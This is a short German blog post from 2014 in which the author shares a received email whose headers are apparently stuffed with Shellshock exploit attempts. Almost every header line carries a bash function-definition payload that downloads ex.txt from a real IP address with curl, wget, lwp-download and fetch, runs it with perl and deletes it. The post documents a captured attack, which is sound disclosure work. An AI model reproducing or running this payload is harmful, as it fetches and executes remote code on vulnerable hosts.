profilephoto
f.zz.de
Blog About Me Impressum
posts /

Shellshock mail

Posted Fri 24 Oct 2014 08:41:52 PM CEST
in

Das ist ja spannend - Da kommt hier eine mail an voll mit shellshock exploits. Offensichtlich scheint das an der ein oder anderen stelle zu funktionieren.

Received: from pax.zz.de ([127.0.0.1])
        by localhost (pax.zz.de [127.0.0.1]) (amavisd-new, port 10024)
        with ESMTP id HiReUx0cpQN1 for <flo+admin@pax.zz.de>;
        Fri, 24 Oct 2014 18:43:08 +0200 (CEST)
Received: from plug.rfc822.org (plug.rfc822.org [195.71.68.84])
        by pax.zz.de (Postfix) with ESMTP id 28353D009E
        for <flo+admin@rfc822.org>; Fri, 24 Oct 2014 18:43:07 +0200 (CEST)
Received: by plug.rfc822.org (Postfix)
        id C2642F95D; Fri, 24 Oct 2014 18:43:07 +0200 (CEST)
Delivered-To: root@localhost
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
        by plug.rfc822.org (Postfix) with SMTP id 7821AF95A
        for <root@localhost>; Fri, 24 Oct 2014 18:43:07 +0200 (CEST)
To: () {:;};cd /tmp;curl -sO 178.254.31.165/ex.txt;lwp-download http: //178.254.31.165/ex.txt@pax.zz.de;,
        wget@pax.zz.de, 178.254.31.165/ex.txt@pax.zz.de;, fetch@pax.zz.de,
        178.254.31.165/ex.txt@pax.zz.de;, perl@pax.zz.de, ex.txt@pax.zz.de;,
        rm@pax.zz.de, -fr@pax.zz.de, ex.*@pax.zz.de;
References:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Cc: () {:;};cd /tmp;curl -sO 178.254.31.165/ex.txt;lwp-download http: //178.254.31.165/ex.txt@pax.zz.de;,
        wget@pax.zz.de, 178.254.31.165/ex.txt@pax.zz.de;, fetch@pax.zz.de,
        178.254.31.165/ex.txt@pax.zz.de;, perl@pax.zz.de, ex.txt@pax.zz.de;,
        rm@pax.zz.de, -fr@pax.zz.de, ex.*@pax.zz.de;
From: () {:;};cd /tmp;curl -sO 178.254.31.165/ex.txt;lwp-download http: //178.254.31.165/ex.txt@pax.zz.de;,
        wget@pax.zz.de, 178.254.31.165/ex.txt@pax.zz.de;, fetch@pax.zz.de,
        178.254.31.165/ex.txt@pax.zz.de;, perl@pax.zz.de, ex.txt@pax.zz.de;,
        rm@pax.zz.de, -fr@pax.zz.de, ex.*@pax.zz.de;
Subject:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Message-ID:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Comments:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Keywords:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-From: () {:;};cd /tmp;curl -sO 178.254.31.165/ex.txt;lwp-download http: //178.254.31.165/ex.txt@pax.zz.de;,
        wget@pax.zz.de, 178.254.31.165/ex.txt@pax.zz.de;, fetch@pax.zz.de,
        178.254.31.165/ex.txt@pax.zz.de;, perl@pax.zz.de, ex.txt@pax.zz.de;,
        rm@pax.zz.de, -fr@pax.zz.de, ex.*@pax.zz.de;
Resent-Message-Id: <20141024164308.F05B0D009F@pax.zz.de>